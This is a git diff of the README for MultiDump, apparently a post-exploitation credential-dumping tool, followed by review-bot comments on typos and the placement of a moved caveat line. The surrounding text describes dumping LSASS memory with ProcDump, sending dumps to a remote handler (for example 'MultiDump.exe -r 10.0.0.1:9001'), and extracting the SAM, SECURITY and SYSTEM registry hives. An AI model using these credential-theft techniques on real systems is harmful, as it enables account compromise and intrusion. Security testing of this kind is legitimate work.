diff --git a/README.md b/README.md index 837b2ea..2d16ad5 100644 --- a/README.md +++ b/README.md @@ -74,6 +74,8 @@ MultiDump.exe If `--procdump` is used, `ProcDump.exe` will be writtern to disk to dump LSASS. +In cmd, `--procdump` _must_ be used, or it will fail per [#5](https://github.com/Xre0uS/MultiDump/issues/5), recommend to always use powerhsell if possible. + In remote mode, MultiDump connects to the handler's listener. ```bash @@ -85,8 +87,6 @@ In remote mode, MultiDump connects to the handler's listener. MultiDump.exe -r 10.0.0.1:9001 ``` -In cmd, `--procdump` _must_ be used, or it will fail per [#5](https://github.com/Xre0uS/MultiDump/issues/5), recommend to always use powerhsell if possible. - The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the `--override-ip` option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump `-r`. An additional option to dump the `SAM`, `SECURITY` and `SYSTEM` hives are available with `--reg`, the decryption process is the same as LSASS dumps. This is more of a convenience feature to make post exploit information gathering easier.
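Review bot: the line added in the first hunk (`+In cmd, `--procdump` _must_ be used, ...`) still carries the typo "powerhsell" and the sentence fragment "recommend to always use powerhsell if possible"; since the line is being moved anyway, correct it to "PowerShell" and make it a full sentence, for example `In cmd, `--procdump` _must_ be used or the dump will fail (see [#5](https://github.com/Xre0uS/MultiDump/issues/5)); use PowerShell where possible.` The unchanged context line directly above it also has "writtern" for "written", which could be fixed in the same README touch-up. Moving the cmd caveat next to the `--procdump` description rather than leaving it in the remote-mode section is the right placement.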
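Review bot: the deletion in the second hunk matches the line inserted in the first hunk character for character, so the caveat is relocated rather than lost and the remote-mode section no longer repeats it; no further change is needed there. While touching this section, the context line "An additional option to dump the `SAM`, `SECURITY` and `SYSTEM` hives are available with `--reg`" has a subject-verb mismatch ("option ... is available") and a comma splice before "the decryption process", which are worth fixing in the same commit.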